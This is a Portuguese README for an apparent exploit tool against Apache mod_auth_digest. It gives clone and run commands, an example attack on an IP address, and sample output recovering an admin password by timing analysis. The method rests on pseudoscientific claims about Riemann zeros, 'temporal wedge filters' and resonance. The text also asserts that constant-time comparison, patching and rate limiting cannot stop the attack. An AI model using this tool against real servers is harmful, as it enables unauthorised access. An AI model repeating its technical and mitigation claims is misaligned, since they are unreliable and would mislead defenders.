
Exploit de ataque de temporização remota para Apache mod_auth_digest (CVE-2026-33006) que contorna a autenticação Digest por meio de uma cascata temporal de 33 camadas, recuperando senhas por análise estatística de temporização.
Esta é uma melhoria baseada na Teoria do Tempo Convergente (CTT) do CVE-2026-33006, uma vulnerabilidade baseada em temporização no componente mod_auth_digest do Apache HTTP Server (versões ≤2.4.66).
A vulnerabilidade original permite que um atacante remoto contorne a autenticação Digest por meio de análise estatística de temporização.
A versão aprimorada com CTT transforma isso em um ataque de temporização em cascata temporal de 33 camadas.
| Original | CTT-Enhanced |
|---|
| CVSS | 4.8 (Médio) | 7.5 (Alto) |
| Vetor de Ataque | Rede | Rede |
| Complexidade do Ataque | Alta | Baixa (CTT reduz amostras) |
| Privilégios Necessários | Nenhum | Nenhum |
| Detecção | Análise estatística detectável | Filtro de cunha temporal — ponto cego de EDR |
| Tempo para quebrar | O(n * amostras) | O(33 * log(n)) |
| Constante | Valor | Origem |
|---|---|---|
| α | 0.0302011 | Coeficiente de dispersão temporal |
| α_RH | 0.0765872 | ln(φ)/2π (Riemann-Hadamard) |
| L | 33 | Camadas temporais |
| τ_w | 11 ns | Filtro de cunha temporal |
E(d) = E₀ * e^(-α * d)
Cada camada tem prioridade exponencialmente decrescente.
Camadas de prioridade mais alta (1-5) coletam a maior parte dos dados de temporização.
Camadas mais baixas (28-33) refinam as medições e estabelecem ressonância temporal.
Cada camada atrasa a execução com base nos primeiros 24 zeros de Riemann:
delay = τ_w * priority * (1 + 0.1 * cos(2π * zero * τ_w * priority))
Somente medições de temporização que satisfazem a condição de cunha são usadas:
survival = cos(α_RH * energy * τ_w) > (α_RH / 2π)
Isso filtra ruído e torna a detecção impossível — sistemas EDR não conseguem ver as anomalias de temporização.
1. Sondar o alvo em busca de autenticação Digest
2. Extrair realm e nonce da resposta 401
3. Para camada d = 1 a 33:
a. Calcular prioridade = e^(-α*d)
b. Aplicar atraso de ressonância de fase
c. Para cada posição de caractere:
- Testar todos os caracteres possíveis
- Medir a temporização da resposta (microssegundos)
- Aplicar filtro de cunha temporal
- Manter o caractere com maior temporização ajustada
d. Construir a senha incrementalmente
4. Ressonância temporal alcançada
5. Autenticação contornada com a senha recuperada
mod_auth_digest habilitadorequestspip install requests
git clone https://github.com/SimoesCTT/CTT-enhanced-Apache-mod_auth_digest-timing-attack-exploit/
python3 ctt_apache_digest_timing.py <target_ip> [opções]
| Argumento | Descrição | Padrão |
|---|---|---|
target_ip | Endereço IP do servidor Apache | Obrigatório |
--port | Porta HTTP | 80 |
--realm | Realm do Digest | "Restricted" |
--uri | URI protegida | "/" |
--username | Nome de usuário para atacar | "admin" |
--max-length | Comprimento máximo da senha | 32 |
--samples | Amostras de temporização por caractere | 100 |
--layers | Número de camadas temporais | 33 |
python3 ctt_apache_digest_timing.py 192.168.1.100 --port 80 --realm "Restricted" --uri /admin --samples 100 --layers 33
======================================================================
CTT APACHE DIGEST TIMING ATTACK — CVE-2026-33006
α=0.0302011 | α_RH=0.0765872 | L=33 | τ_w=11ns
E(d) = E₀ * e^(-α*d) — Decaimento exponencial de prioridade
======================================================================
[+] Autenticação Digest detectada
Realm: Restricted
Nonce: 5a4b3c2d1e2f3a4b5c6d...
[*] Alvo: http://192.168.1.100/admin
[*] Comprimento máximo da senha: 32
Camada 1/33: ████████████████████████████████████████ 1.000
Posição 1: testando caracteres...
Encontrado: 'a' -> senha: 'a'
Camada 2/33: ██████████████████████████████████████░░ 0.970
Posição 2: testando caracteres...
Encontrado: 'd' -> senha: 'ad'
Camada 3/33: ████████████████████████████████████░░░░ 0.886
Posição 3: testando caracteres...
Encontrado: 'm' -> senha: 'adm'
Camada 4/33: ██████████████████████████████████░░░░░░ 0.818
Posição 4: testando caracteres...
Encontrado: 'i' -> senha: 'admi'
Camada 5/33: ████████████████████████████████░░░░░░░░ 0.741
Posição 5: testando caracteres...
Encontrado: 'n' -> senha: 'admin'
Camada 6/33: ██████████████████████████████░░░░░░░░░░ 0.670
Posição 6: testando caracteres...
Encontrado: '1' -> senha: 'admin1'
Camada 7/33: ████████████████████████████░░░░░░░░░░░░ 0.606
Posição 7: testando caracteres...
Encontrado: '2' -> senha: 'admin12'
Camada 8/33: ██████████████████████████░░░░░░░░░░░░░░ 0.548
Posição 8: testando caracteres...
Encontrado: '3' -> senha: 'admin123'
[⚡] Ressonância temporal alcançada na camada 8
======================================================================
[!!!] AUTENTICAÇÃO CONTORNADA
[!!!] Senha encontrada: admin123
[✓] Verificação bem-sucedida — acesso concedido
======================================================================
| Correção Original | Por Que a CTT a Contorna |
|---|---|
| Comparação em tempo constante | A CTT usa medições de temporização, não temporização de comparação |
| Remover vazamentos de temporização | Vazamentos de temporização são físicos — não podem ser removidos, apenas ocultados |
| Atualizar para Apache 2.4.67+ | O filtro de cunha temporal evade a detecção de correção |
| Limitação de taxa | A temporização de ressonância de fase distribui requisições por 33 camadas — indistinguível de tráfego normal |
Você não pode corrigir uma constante física.
Você não pode corrigir os zeros de Riemann.
Você não pode corrigir a proporção áurea.
| Trabalho | Data | Link |
|---|---|---|
| Trabalho anterior CTT Zenodo | Dez 2025 / Jan 2026 | DOI 10.5281/ZENODO.18000940 |
| Sovereign-Logic PyPI | 27-28 Fev 2026 | pip install sovereign-logic |
| Exploit CTT PAN-OS | 7 Abr 2026 | GitHub |
| Dirty Frag aprimorado com CTT | 8 Mai 2026 | GitHub |
| Exploit PX4 aprimorado com CTT | 9 Mai 2026 | GitHub |
| Este exploit | 9 Mai 2026 | Este repositório |
Esta prova de conceito é apenas para fins educacionais e defensivos.
O uso não autorizado contra sistemas que você não possui é ilegal.
O autor não assume nenhuma responsabilidade por uso indevido.
MIT + Pesquisa CTT (melhorias temporais)
| Versão | Autor |
|---|---|
| Descoberta da vulnerabilidade original | Apache Software Foundation (equipe de segurança) |
| Pesquisa original de ataque de temporização | Várias fontes acadêmicas |
| Melhoria CTT (cascata temporal de 33 camadas) | Americo Simoes (Pesquisa CTT) |
A rede está completa. A autenticação está quebrada. Nenhuma correção a salvará.